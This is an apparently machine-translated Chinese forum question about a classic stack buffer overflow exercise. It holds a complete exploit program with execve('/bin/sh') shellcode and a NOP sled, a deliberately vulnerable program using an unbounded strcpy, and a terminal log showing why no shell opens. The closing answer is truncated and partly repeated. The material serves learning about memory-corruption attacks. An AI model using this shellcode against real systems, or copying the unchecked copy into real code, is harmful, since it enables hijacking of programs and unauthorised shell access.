我试图使缓冲区溢出并运行shellcode以执行bin / sh
对于我们的缓冲区大小,一个好的选择比我们尝试溢出的缓冲区大小大约多100个字节。这会将我们的代码放置在我们尝试溢出的缓冲区的末尾,为NOP留出了很多空间,但是仍然用我们猜测的地址覆盖了返回地址。我们尝试溢出的缓冲区长512个字节,因此我们将使用612。
exploit3.c
#include <stdlib.h> #include <stdio.h> #include <string.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define NOP 0x90 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi(argv[1]); if (argc > 2) offset = atoi(argv[2]); if (!(buff = malloc(bsize))) { printf("Can't allocate memory.\n"); exit(0); } addr = get_sp() - offset; printf("Using address: 0x%lx\n", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; for (i = 0; i < bsize/2; i++) buff[i] = NOP; ptr = buff + ((bsize/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize - 1] = '\0'; memcpy(buff,"EGG=",4); putenv(buff); system("/bin/bash"); }
vulnerable.c
#include <unistd.h> #include <string.h> int main(int argc, char *argv[]) { char xbuff[512]; if(argc >1) strcpy(xbuff, argv[1]); return 0; }
程序已执行,但未调用bin / sh:
[aleph1]$ ./exploit3 612 Using address: 0xbffffdb4 [aleph1]$ ./vulnerable $EGG [aleph1]$
预期输出是:
[aleph1]$ ./exploit3 612 Using address: 0xbffffdb4 [aleph1]$ ./vulnerable $EGG $ exit [aleph1]$
有什么问题吗?!
第二个问题
:exploit3.c为什么最后运行system(“ / bin / bash”)main()的?我试图使缓冲区溢出并运行shellcode来执行bin / sh。对于我们的缓冲区大小,好的选择比我们尝试溢出的缓冲区大小大约多100个字节。这将...
exploit3
在最后运行一个shell,因为它在这里